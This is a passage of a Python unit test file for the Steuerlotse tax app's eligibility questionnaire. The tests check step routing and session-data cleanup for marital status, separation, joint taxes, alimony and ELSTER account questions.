self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedLivedTogetherEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_then_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_lived_together_eligibility': 'yes'}))
expected_url = step.url_for_step(SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_lived_together_eligibility': 'no'}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with self.app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_lived_together_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'yes', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(self.correct_session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSeparatedJointTaxesEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'yes',
'separated_lived_together_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_then_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_joint_taxes_eligibility': 'yes'}))
expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_joint_taxes_eligibility': 'no'}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with self.app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'separated_joint_taxes_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data_with_incorrect_key = {**self.correct_session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(self.correct_session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(self.correct_session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestMarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def test_handle_sets_correct_prev_url(self):
with self.app.test_request_context():
step = MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'yes'}))
expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_failure_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'no'}))
expected_url = step.url_for_step(MarriedJointTaxesEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with self.app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestMarriedAlimonyEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.test_request_context = test_request_context
def test_handle_sets_correct_prev_url(self):
step = MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestMarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
expected_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_failure_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'yes'}))
expected_url = step.url_for_step(MarriedAlimonyEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_not_separated_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MarriedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_separated_correct_session_data_then_set_prev_input_step_correctly(self):
alternative_data = {**self.correct_session_data, **{'separated_since_last_year_eligibility': 'yes',
'separated_lived_together_eligibility': 'yes',
'separated_joint_taxes_eligibility': 'yes'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with self.app.test_request_context(method='POST'), \
patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes'}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.alimony.yes', 'form.eligibility.alimony.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.alimony.no', 'form.eligibility.alimony.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.alimony_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.alimony.yes', 'form.eligibility.alimony.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.alimony.no', 'form.eligibility.alimony.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.alimony_eligibility.choices)
class TestUserAElsterAccountEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'yes'}))
expected_url = step.url_for_step(UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MarriedAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserAElsterAccountEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestUserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'no'}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'yes'}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_b_has_elster_account_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
